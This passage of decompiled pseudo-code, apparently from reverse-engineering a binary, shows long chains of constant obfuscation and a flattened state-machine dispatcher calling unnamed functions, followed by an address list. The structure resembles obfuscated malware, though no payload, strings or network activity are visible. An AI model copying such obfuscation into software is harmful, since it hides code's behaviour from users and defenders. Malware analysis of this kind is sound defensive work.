				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
				_v452 = _v452 | 0xbb60e7c3;
				_v452 = _v452 ^ 0x0d3b8c6d;
				_v452 = _v452 ^ 0xb65710e5;
				_v636 = 0x61f3a7;
				_v636 = _v636 + 0xffff300f;
				_v636 = _v636 << 1;
				_v636 = _v636 * 0x27;
				_v636 = _v636 ^ 0x1d9bc7e7;
				_v224 = 0x725254;
				_v224 = _v224 + 0xfffffac1;
				_v224 = _v224 ^ 0x007e9bc6;
				_v228 = 0xd6200c;
				_v228 = _v228 ^ 0x5ef32346;
				_v228 = _v228 ^ 0x5e2a0e2d;
				_v540 = 0xc12668;
				_v540 = _v540 << 8;
				_v540 = _v540 * 0x51;
				_v540 = _v540 + 0xffff6981;
				_v540 = _v540 ^ 0x1d2c502d;
				_v496 = 0x68726f;
				_v496 = _v496 + 0xb8c4;
				_v496 = _v496 + 0xffff3269;
				_v496 = _v496 << 1;
				_v496 = _v496 ^ 0x00d37668;
				_v296 = 0x65f16b;
				_v296 = _v296 ^ 0xac840f83;
				_v296 = _v296 ^ 0xace8f4ad;
				_v336 = 0xf34185;
				_v336 = _v336 + 0xffff7084;
				_v336 = _v336 ^ 0x22f89925;
				_v336 = _v336 ^ 0x2207d32f;
				_v400 = 0x9220b0;
				_v400 = _v400 | 0xa2c46701;
				_v400 = _v400 + 0x1a14;
				_v400 = _v400 ^ 0xa2d5ce26;
				_v368 = 0x18190f;
				_v368 = _v368 * 0x6c;
				_t1203 = 0x47;
				_v368 = _v368 * 0x49;
				_v368 = _v368 ^ 0xe62bbbec;
				_v276 = 0x664929;
				_v276 = _v276 + 0xffffab3c;
				_v276 = _v276 ^ 0x0066f8be;
				_v420 = 0x55fac4;
				_v420 = _v420 / _t1203;
				_v420 = _v420 | 0x23698c02;
				_v420 = _v420 ^ 0x23676b12;
				_v428 = 0x2d8f3d;
				_v428 = _v428 ^ 0xcbbc8554;
				_v428 = _v428 + 0xffff5f5b;
				_v428 = _v428 ^ 0xcb969d3b;
				_v408 = 0x7d0ed3;
				_t1204 = 0x33;
				_v408 = _v408 / _t1204;
				_v408 = _v408 ^ 0x03ccba73;
				_v408 = _v408 ^ 0x03c41a74;
				_v212 = 0xf1bcf;
				_v212 = _v212 | 0xafbe7d4b;
				_v212 = _v212 ^ 0xafbe5483;
				_v476 = 0x76a0ac;
				_v476 = _v476 << 0xa;
				_v476 = _v476 << 2;
				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E007B66CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E007B1FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E007C0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E007B95FA();
									_t1122 = E007B1FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E007BC110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E007A59F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E007B20B0();
								_t1125 = E007B1DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E007B0326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
						if(_t1349 == 0) {
							E007B8519(_v244, _v352, _v188);
							L34:
							_t1317 = 0xe4333b3;
							continue;
						}
						_t1350 = _t1317 - 0x27d9d92;
						if(_t1350 > 0) {
							__eflags = _t1317 - 0x2a998d8;
							if(_t1317 == 0x2a998d8) {
								_t1124 = E007A1A56( &_v180,  &_v84, _v572, _v516);
								__eflags = _t1124;
								if(_t1124 != 0) {
									_t1125 = _v28;
									__eflags = _t1125 - 8;
									if(_t1125 != 8) {
										__eflags = _t1125;
										if(_t1125 == 0) {
											L32:
											_t1317 = 0xa65551a;
											continue;
										}
										__eflags = _t1125 - 1;
										if(_t1125 != 1) {
											goto L27;
										}
										goto L32;
									}
									_t1317 = 0xc1a4fe5;
									continue;
								}
								_t1125 = E007B0AE0(_v308, _v564);
								_pop(_t1237);
								_t1314 = _t1125;
								_t1191 = 0x5dcd6da;
								goto L27;
							}
							__eflags = _t1317 - 0x2cf0ed0;
							if(_t1317 == 0x2cf0ed0) {
								_t1125 = E007BCB5B(_v340, _v248, _v348, _v356);
								goto L114;
							}
							__eflags = _t1317 - 0x3250d84;
							if(__eflags == 0) {
								_v196 = E007B7BA6( &_v192, _v596, __eflags, _v492, 0x7a1444);
								_v204 = E007B7BA6( &_v200, _v316, __eflags, _v344, 0x7a14b4);
								_t1130 = E007A5361(_v460, _v524,  &_v196,  &_v204);
								_t1345 = _t1345 + 0x1c;
								asm("sbb esi, esi");
								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
								E007AA8B0(_v376, _v204, _v424);
								_t1125 = E007AA8B0(_v580, _v196, _v328);
								goto L109;
							}
							__eflags = _t1317 - 0x3ace1b1;
							if(_t1317 != 0x3ace1b1) {
								goto L109;
							}
							_t1125 = E007B473C();
							_t1317 = 0xc245297;
							continue;
						}
						if(_t1350 == 0) {
							_t1141 = E007B4116();
							__eflags = _t1141;
							if(_t1141 == 0) {
								_t1125 = E007B1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
							} else {
								_t1125 = E007B1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
							}
							continue;
						}
						if(_t1317 == 0xc4dcd) {
							_t1125 = E007B8519(_v440, _v612, _v180);
							_t1317 = 0x3d71c3c;
							continue;
						}
						if(_t1317 == 0x283259) {
							_t1125 = E007A64E2(_v476, _v332, _v252,  &_v188, E007A4E74(), _v232, _v620,  &_v180);
							_t1345 = _t1345 + 0x18;
							asm("sbb esi, esi");
							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
							continue;
						}
						if(_t1317 == 0x1b53ec1) {
							_t1125 = E007B87D1();
							_v104 = _t1125;
							_t1317 = 0xfa2c753;
							continue;
						}
						if(_t1317 != 0x1f27ca8) {
							goto L109;
						}
						_t1125 = E007B20BA();
						if(_t1125 == 0) {
							goto L114;
						} else {
							_t1317 = 0xa7d0a44;
							continue;
						}
					}
					__eflags = _t1317 - 0xa7d0a44;
					if(__eflags > 0) {
						__eflags = _t1317 - 0xd7f216f;
						if(__eflags > 0) {
							__eflags = _t1317 - 0xdbd69f4;
							if(_t1317 == 0xdbd69f4) {
								_t1114 = E007B9BCF();
								__eflags = _t1114;
								if(_t1114 != 0) {
									L85:
									_t1317 = 0x2cf0ed0;
									goto L1;
								}
								_t1317 = 0xc7d9b3b;
								goto L109;
							}
							__eflags = _t1317 - 0xe4333b3;
							if(_t1317 == 0xe4333b3) {
								__eflags = _t1314 - _v288;
								if(_t1314 == _v288) {
									L106:
									_t1317 = _t1191;
									goto L109;
								}
								_t1134 = E007A4E74();
								_t1237 = _v480;
								_t1125 = E007A8DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
								_t1345 = _t1345 + 0x10;
								__eflags = _t1125 - _v372;
								if(_t1125 == _v372) {
									_t1125 = E007A6D24();
									goto L106;
								}
								_t1317 = 0x942db73;
								goto L1;
							}
							__eflags = _t1317 - 0xfa2c753;
							if(_t1317 != 0xfa2c753) {
								goto L109;
							}
							_t1125 = E007BD2CE(_t1237);
							_v172 = _t1125;
							_t1317 = 0x42dc4f0;
							goto L1;
						}
						if(__eflags == 0) {
							_t1125 = E007B7D48(_t1237, __eflags);
							__eflags = _t1125;
							if(_t1125 == 0) {
								goto L114;
							}
							_t1317 = 0x4a24b69;
							goto L1;
						}
						__eflags = _t1317 - 0xb2497b0;
						if(_t1317 == 0xb2497b0) {
							_t1125 = E007ADFF3();
							_t1317 = 0x3250d84;
							goto L1;
						}
						__eflags = _t1317 - 0xc1a4fe5;
						if(_t1317 == 0xc1a4fe5) {
							_t1125 = E007B7DD5();
							goto L114;
						}
						__eflags = _t1317 - 0xc245297;
						if(_t1317 == 0xc245297) {
							_t1125 = E007B8BE3();
							_t1317 = 0x6397bd0;
							goto L1;
						}
						__eflags = _t1317 - 0xc7d9b3b;
						if(_t1317 != 0xc7d9b3b) {
							goto L109;
						}
						_t1125 = E007A51BB();
						_t1317 = 0xb2497b0;
						goto L1;
					}
					if(__eflags == 0) {
						_t1125 = E007B9EEC();
						asm("sbb esi, esi");
						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
						goto L1;
					}
					__eflags = _t1317 - 0x8955e2f;
					if(__eflags > 0) {
						__eflags = _t1317 - 0x8c1c67e;
						if(_t1317 == 0x8c1c67e) {
							_t1125 = E007B1EE7();
							goto L85;
						}
						__eflags = _t1317 - 0x942db73;
						if(_t1317 == 0x942db73) {
							_t1125 = E007A91B0(_t1237);
							goto L114;
						}
						__eflags = _t1317 - 0xa65551a;
						if(_t1317 == 0xa65551a) {
							_t1125 = E007AB2C7(_v412, _v268,  &_v36);
							_pop(_t1237);
							__eflags = _t1125;
							if(_t1125 == 0) {
								_t1125 = _v28;
								__eflags = _t1125;
								if(_t1125 == 0) {
									_t1314 = E007B0AE0(_v260, _v208);
									_t1125 = _v28;
									_pop(_t1237);
								}
								__eflags = _t1125 - 1;
								if(_t1125 == 1) {
									_t1125 = E007B0AE0(_v528, _v536);
									_pop(_t1237);
									_t1314 = _t1125;
								}
							} else {
								_t1314 = _v560;
							}
							_t1191 = 0x5dcd6da;
							_t1317 = 0x53c3717;
							goto L1;
						}
						__eflags = _t1317 - 0xa74297b;
						if(_t1317 != 0xa74297b) {
							goto L109;
						}
						_t1125 = E007A75F1();
						_v100 = _t1125;
						_t1317 = 0x1b53ec1;
						goto L1;
					}
					if(__eflags == 0) {
						_t1125 = E007BE1D4();
						__eflags = _t1125;
						if(_t1125 == 0) {
							goto L114;
						}
						_t1317 = 0x1f27ca8;
						goto L1;
					}
					__eflags = _t1317 - 0x6eeee91;
					if(_t1317 == 0x6eeee91) {
						_t1237 = _v276;
						_t1125 = E007A2251(_v276,  &_v188,  &_v172, _v420, _v428);
						_t1345 = _t1345 + 0xc;
						asm("sbb esi, esi");
						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
						goto L1;
					}
					__eflags = _t1317 - 0x7289877;
					if(_t1317 == 0x7289877) {
						E007BE1D4();
						_t1191 = 0x3fc5519;
						_t1125 = E007B0AE0(_v584, _v436);
						_t1314 = _t1125;
						goto L34;
					}
					__eflags = _t1317 - 0x77c68ce;
					if(_t1317 == 0x77c68ce) {
						_t1125 = E007B5CC4();
						_t1317 = 0x8c1c67e;
						goto L1;
					}
					__eflags = _t1317 - 0x8690ed6;
					if(_t1317 != 0x8690ed6) {
						goto L109;
					}
					_t1125 = E007B044F();
					__eflags = _t1125;
					if(_t1125 == 0) {
						goto L114;
					}
					_t1317 = 0x8955e2f;
					goto L1;
					L109:
					__eflags = _t1317 - 0xccbb739;
				} while (_t1317 != 0xccbb739);
				goto L114;
			}

0x007b2556
0x007b255c
0x007b2569
0x007b2571
0x007b257c
0x007b2587
0x007b258f
0x007b2597
0x007b259f
0x007b25a7
0x007b25af
0x007b25ba
0x007b25c2
0x007b25cd
0x007b25d8
0x007b25e0
0x007b25f8
0x007b25fd
0x007b2606
0x007b2611
0x007b2616
0x007b2621
0x007b262c
0x007b2637
0x007b263f
0x007b2647
0x007b264f
0x007b2657
0x007b265f
0x007b266a
0x007b2675
0x007b2680
0x007b268c
0x007b2691
0x007b2697
0x007b269f
0x007b26a7
0x007b26af
0x007b26b7
0x007b26bf
0x007b26cb
0x007b26ce
0x007b26d2
0x007b26da
0x007b26e2
0x007b26e7
0x007b26ef
0x007b26f4
0x007b26fc
0x007b2704
0x007b2711
0x007b2715
0x007b271d
0x007b2725
0x007b2730
0x007b2738
0x007b274b
0x007b2752
0x007b275d
0x007b2768
0x007b2770
0x007b2778
0x007b2780
0x007b278b
0x007b2793
0x007b279d
0x007b27a2
0x007b27a7
0x007b27af
0x007b27b7
0x007b27bc
0x007b27c4
0x007b27cc
0x007b27d4
0x007b27e9
0x007b27ec
0x007b27ed
0x007b27fe
0x007b2805
0x007b2810
0x007b281b
0x007b2826
0x007b2831
0x007b283c
0x007b2847
0x007b2852
0x007b285d
0x007b2865
0x007b2870
0x007b287b
0x007b2886
0x007b2891
0x007b289c
0x007b28a4
0x007b28ac
0x007b28bc
0x007b28c0
0x007b28c8
0x007b28d8
0x007b28dc
0x007b28e4
0x007b28ec
0x007b28f4
0x007b28fc
0x007b2901
0x007b2906
0x007b290e
0x007b2916
0x007b2928
0x007b292d
0x007b2936
0x007b2941
0x007b294c
0x007b295f
0x007b2960
0x007b2967
0x007b2972
0x007b2985
0x007b298c
0x007b2997
0x007b29ab
0x007b29b2
0x007b29ba
0x007b29c5
0x007b29d0
0x007b29e7
0x007b29ea
0x007b29f1
0x007b29fc
0x007b2a07
0x007b2a12
0x007b2a1d
0x007b2a28
0x007b2a33
0x007b2a3b
0x007b2a46
0x007b2a51
0x007b2a64
0x007b2a6b
0x007b2a72
0x007b2a7d
0x007b2a93
0x007b2a9a
0x007b2aa5
0x007b2ab8
0x007b2abb
0x007b2ac2
0x007b2aca
0x007b2ad5
0x007b2add
0x007b2ae2
0x007b2aea
0x007b2af2
0x007b2b05
0x007b2b0c
0x007b2b17
0x007b2b1f
0x007b2b2a
0x007b2b35
0x007b2b3d
0x007b2b48
0x007b2b53
0x007b2b5a
0x007b2b65
0x007b2b70
0x007b2b83
0x007b2b8a
0x007b2ba0
0x007b2ba7
0x007b2bb2
0x007b2bba
0x007b2bc2
0x007b2bca
0x007b2bcf
0x007b2bd7
0x007b2bea
0x007b2beb
0x007b2bfa
0x007b2c01
0x007b2c08
0x007b2c13
0x007b2c1e
0x007b2c26
0x007b2c31
0x007b2c3c
0x007b2c47
0x007b2c58
0x007b2c5f
0x007b2c6c
0x007b2c74
0x007b2c7c
0x007b2c86
0x007b2c8b
0x007b2c91
0x007b2c99
0x007b2ca4
0x007b2caf
0x007b2cba
0x007b2ccd
0x007b2cce
0x007b2cd5
0x007b2ce0
0x007b2cf3
0x007b2cfa
0x007b2d05
0x007b2d10
0x007b2d1e
0x007b2d22
0x007b2d2a
0x007b2d2f
0x007b2d37
0x007b2d42
0x007b2d4a
0x007b2d55
0x007b2d5d
0x007b2d62
0x007b2d67
0x007b2d6f
0x007b2d77
0x007b2d82
0x007b2d8d
0x007b2d98
0x007b2da3
0x007b2dab
0x007b2db3
0x007b2dbc
0x007b2dc0
0x007b2dc8
0x007b2dd3
0x007b2dde
0x007b2de9
0x007b2df4
0x007b2dff
0x007b2e0a
0x007b2e12
0x007b2e1c
0x007b2e20
0x007b2e28
0x007b2e30
0x007b2e3b
0x007b2e46
0x007b2e51
0x007b2e58
0x007b2e63
0x007b2e6e
0x007b2e79
0x007b2e84
0x007b2e8f
0x007b2e9a
0x007b2ea5
0x007b2eb0
0x007b2ebb
0x007b2ec6
0x007b2ed1
0x007b2edc
0x007b2eef
0x007b2f02
